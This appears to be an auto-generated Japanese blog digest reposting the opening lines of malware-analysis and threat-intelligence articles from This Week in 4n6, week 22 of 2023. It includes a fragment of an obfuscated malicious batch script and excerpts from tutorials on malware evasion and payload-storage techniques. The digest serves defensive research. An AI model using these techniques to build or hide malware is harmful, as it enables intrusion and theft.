解析メモ

マルウェア解析してみたり解析に役に立ちそうと思ったことをメモする場所。このサイトはGoogle Analyticsを利用しています。

4n6 Week 22 – 2023 - MALWARE

本エントリは This Week in 4n6 (FourAndSix=Forensics) で紹介された各記事の冒頭を表示し、チェックする記事をザッピングするために自動生成&投稿したものです。4n6 は こちら からご確認いただけます。

MALWARE

0day in {REA_TEAM}

(1) [QuickNote.En] CobaltStrike SMB Beacon Analysis (1) [QuickNote] Analysis of malware suspected to be an APT attack targeting Vietnam (1) [QuickNote] Analysis of Pandora ransomware (1) [QuickNote] Another nice PlugX sample (1) [QuickNote] CobaltStrike SMB Beacon Analysis (1) [QuickNote] Decrypting the C2 configuration of Warzone RAT (1) [QuickNote] Emotet epoch4 & epoch5 tactics (1) [QuickNote] Techniques for decrypting BazarLoader strings (1) [QuickNote] VidarStealer Analysis (1) [Write-up] C...

ASEC

AhnLab Security Emergency response Center (ASEC) has recently discovered the case of Remcos RAT being installed on poorly managed MS-SQL servers. Unlike the past attack, the recent case showed the threat actor using sqlps to distribute the malware. Sqlps is SQL Server PowerShell and is included in the SQL Server installation procedure[1]. SQL Server Powershell allows users to use the Powershell cmdlet which is needed to manage SQL Server instances. The attacker exploited this trait in distributi...

AhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of malware targeting web servers by Kimsuky group. Kimsuky is a threat group deemed supported by North Korea and has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a Korean energy corporation in 2014. Since 2017, their attacks have been targeting countries other than South Korea as well. [1] ASEC has been providing the analysis of vari...

AhnLab Security Emergency response Center (ASEC) has recently discovered that the Kimsuky group had created a webmail website that looks identical to certain national policy research institutes. Earlier this year, ASEC had covered similar issues in the posts ‘Web Page Disguised as a Kakao[1]/Naver[2] Login Page’. The previous attacker set the fake login page with autocompleted IDs of trade, media, and North Korea-related individuals and organizations. In addition to that, the recently discovered...

AhnLab Security Emergency response Center (ASEC) analysis team has recently confirmed the StrelaStealer Infostealer being distributed to Spanish users. StrelaStealer was initially discovered around November 2022 and has been distributed as an attachment to spam emails. In the past, ISO files were used as attachments, but recently, ZIP files have been utilized instead. Figure 1. Distributed email The email that is being distributed is similar to the one shown in Figure 1. The email body and the n...

AhnLab Security Emergency response Center (ASEC) has recently confirmed the Lazarus group, a group known to receive support on a national scale, carrying out attacks against Windows IIS web servers. Ordinarily, when threat actors perform a scan and find a web server with a vulnerable version, they use the vulnerability suitable for the version to install a web shell or execute malicious commands. The AhnLab Smart Defense (ASD) log displayed below in Figure 1 shows that Windows server systems are...

AhnLab Security Emergency response Center (ASEC) has recently discovered the DarkCloud malware being distributed via spam email. DarkCloud is an Infostealer that steals account credentials saved on infected systems, and the threat actor installed ClipBanker alongside DarkCloud. 1. Distribution Method The threat actor sent the following email to induce users to download and execute the attachment. Figure 1. Email from the threat actor with the malware attached The contents of this email prompt us...

AhnLab Security Emergency response Center (ASEC) monitors phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. This post will cover the cases of distribution of phishing emails during the week from May 7th, 2023 to May 13th, 2023 and provide statistical information on each type. Generally, phishing is cited as an attack that leaks users’ login account credentials by disguising as or impersonating an institute, company, or individual through social engineeri...

Following the recent abuse of vulnerabilities in various malware distributions and attacks, it is becoming more crucial to detect said information early on. Zero-day and other various vulnerabilities are typically spread faster through social networks. AhnLab provides the trend of current vulnerabilities through the ATIP service based on the information collected by the in-house infrastructure. Additionally, ATIP offers information on said vulnerabilities’ characteristics and countermeasures thr...

The Kimsuky group’s activities in March 2023 showed a decline in comparison to their activities in February. Unlike the past where most major issues were found in the FlowerPower type, this month was focused on the RandomQuery type, which showed the highest amount of activity. The FlowerPower type began to use “Korean domains”, and it has been confirmed that the RandomQuery type has been using various initial distribution methods and using new ways to distribute xRAT. Finally, it has been confir...

This report provides statistics on new ransomware samples, attacked systems, and targeted businesses in March 2023, as well as notable ransomware issues in Korea and overseas. Other major issues and statistics for ransomware that are not mentioned in the report can be found by searching for the following keywords or via the statistics menu at AhnLab Threat Intelligence Platform (ATIP). Ransomware Statistics by Type The number of ransomware samples and targeted systems are based on the aliases de...

March 2023 Deep Web & Dark Web Threat Trend Report This trend report on the deep web and dark web of March 2023 is sectioned into Ransomware, Forum & Black Market, and Threat Actor. We would like to state beforehand that some of the content has yet to be confirmed to be true. 1) Ransomware (1) Clop Ransomware (2) BlackCat (Alphv) Ransomware (3) LockBit Ransomware (4) Medusa Ransomware 2) Forum & Black Market (1) Breached Forums Closed 3) Threat Actor (1) Netwire RAT Malware Infrastructure Confis...

AhnLab Security Emergency response Center (ASEC) uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from May 15th, 2023 (Monday) to May 21st, 2023 (Sunday). For the main category, Infostealer ranked top with 43.8%, followed by downloader with 36.9%, backdoor with 15.3%, ransomware with 3.4%, and CoinMiner with 0.6%. Top 1 – Amadey This week, Amadey Bot ranked first place with 25.6%. Amadey is a downloader that...

AhnLab Security Emergency response Center (ASEC) has previously covered the case where SparkRAT was distributed contained within a Korean VPN’s installer in the post, “SparkRAT Being Distributed Within a Korean VPN Installer”[1]. This VPN was commonly installed by Chinese users who required better access to the Internet, and the problem was addressed after the blog post was uploaded. However, there have been recent cases indicating the resurgence of malware distributing SparkRAT through the inst...

c3rb3ru5d3d53c

YouTube video

Erik Pistelli at Cerbero

This malicious OneNote document contains two obfuscated batch scripts and we’ll be using our commercial Simple Batch Emulator package to understand what they do. SHA256: 46149F56028829246628FFAFC58DF81A4B0FF1C87ED6466492E25AD2F23C0A13 We open the first batch script and decode its data to text with the action “Conversion -< Bytes to text” (Ctrl+R). This is the batch script and as we can see it’s obfuscated. GIFTS WITH DISCOUNTS <nul 2<&1 LIMITED OFFER @echo off echo Opening cloud attachment. Plea...

ClearSky Cyber Security

Cluster25

By Cluster25 Threat Intel Team May 22, 2023 BlackByte is a Ransomware-as-a-Service (RaaS) group that is known for the use of the homonymous malware that is constantly updated and spread in different variants. The first implementation of the malware was written in the C# programming language, which was followed by a Golang implementation that also integrated a privilege escalation technique that exploited the Bring Your Own Vulnerable Driver (BYOVD) vulnerability. The last implementation, known a...

Bret at Cyber Gladius

If you have not heard, Adobe’s ColdFusion has a killer RCE vulnerability. As a result, I have a few new Windows IIS webserver incidents to investigate. Most of the investigation focused on determining what the attacker did and if data exfiltration occurred. To answer this question, I had to perform a lot of PowerShell deobfuscation. So I wanted to write up my process to deobfuscate malicious PowerShell and maybe help those facing the same challenge in the future. Before I jump into this maliciou...

dr4k0nia

Post CancelNixImports a .NET loader using HInvoke Posted May 22, 2023 Updated May 22, 2023 By dr4k0nia 8 min readA while ago, I released HInvoke, a project showcasing API hashing for managed functions. The initial release was rather basic and lacked desirable features like support for non-static methods. NixImports is an example showing the use of the new HInvoke. The update includes support for non-static methods as well as support for nonunique method names. In this blog post, I will describe ...

Igor Skochinsky at Hex Rays

Igal lytzki at Toxin Labs

Skip links Skip to primary navigation Skip to content Skip to footer Toxin Labs Malware Analysis Threat Breakdown Threat Hunting All Tags Toggle search Toggle menu Kraken - The Deep Sea Lurker Part 2 Part 2 of analyzing the KrakenKeylogger Malware 5 minute read 0xToxin Threat Analyst & IR team leader - Malware Analysis - Blue Team Follow Israel Email Twitter GitHub LinkedIn On This Blog Intro What we have? thereccorp.com Analysis RareCommodityHelper.exe RareCommodityHelper.exe masherofmasters.cy...

InfoSec Write-ups

Open in appSign upSign InWriteSign upSign InGhidra — A powerful Reverse Engineering ToolSuprajabaskaran·FollowPublished inInfoSec Write-ups·5 min read·May 20--1ListenShareHello everyone, I recently started exploring Ghidra, an open-source reverse engineering tool. Through reverse engineering, hackers can analyze a program’s components and functionalities in order to identify any vulnerabilities. By analyzing the code or binary of the program, one can recover the original software design for more...

Learn how to reverse engineer a basic level binary to get a password.Jay Vadhaiya·FollowPublished inInfoSec Write-ups·10 min read·May 19--ListenShareGreetings of the day everyone, in today’s blog post I am going to showcase how to use certain tools to analyze and reverse engineer a simple binary program to get a hidden password. Without further due, let’s get started.Photo by ThisisEngineering RAEng on UnsplashIntroductionReverse Engineering of a binary is a process of analyzing and understandin...

Lab52

May 22, 2023 The malware team at Lab52 has a saying that our colleages know well: “We want your malware”. On this occasion, the Theat Intelligence team gifted us a file that appeared to be a dropper. The file was already flagged by 15 antivirus engines on VirusTotal as malicious. Target file in VirusTotal Among the open files, the results of specific calls to Powershell.exe are displayed. VirusTotal information from the sandboxes Due to its context, it could be interesting to investigate it furt...

Jakub Kaloč at WeLiveSecurity

ESET researchers reveal details about a prevalent cryptor, operating as a cryptor-as-a-service used by tens of malware families Jakub Kaloč 25 May 2023 - 11:30AM Share ESET researchers reveal details about a prevalent cryptor, operating as a cryptor-as-a-service used by tens of malware families In this blogpost we examine the operation of AceCryptor, originally documented by Avast. This cryptor has been around since 2016 and because – throughout its existence – it has been used to pack tens of m...

Zhassulan Zhussupov

Malware development trick - part 29: Store binary data in registry. Simple C++ example. 7 minute read ﷽ Hello, cybersecurity enthusiasts and white hackers! Today, I just want to focus my research on another malware development trick: storing binary data in Windows Registry. It is a common technique that can be used by malware for persistence or also to store malicious payloads. practical example 1 Below is a simple example code of storing binary data in the registry: void registryStore() { HKEY ...

Malware development trick - part 30: Find PID via NtGetNextProcess. Simple C++ example. 5 minute read ﷽ Hello, cybersecurity enthusiasts and white hackers! Today, I just want to focus my research on another malware development trick: enum processes and find PID via NtGetNextProcess. It is a common technique that can be used by malware for AV evasion also. what’s the trick? We just simply utilize additional undocumented features. NtGetNextProcess is a system call made available by the kernel that...

Nikolaos Pantazopoulos and Brett Stone-Gross at ZScaler

THE ZSCALER EXPERIENCE THE ZSCALER EXPERIENCE Learn about: Your world, secured. Zero Trust Security Service Edge (SSE) Secure Access Service Edge (SASE) Zero Trust Network Access (ZTNA) Secure Web Gateway (SWG) Cloud Access Security Broker (CASB) Cloud Native Application Protection Platform (CNAPP) PRODUCTS & SOLUTIONS PRODUCTS & SOLUTIONS Secure Your Users Secure Your Workloads Secure Your IoT and OT Secure Internet Access (ZIA) Secure Private Access (ZPA) Data Protection (CASB/DLP) Digital Exp...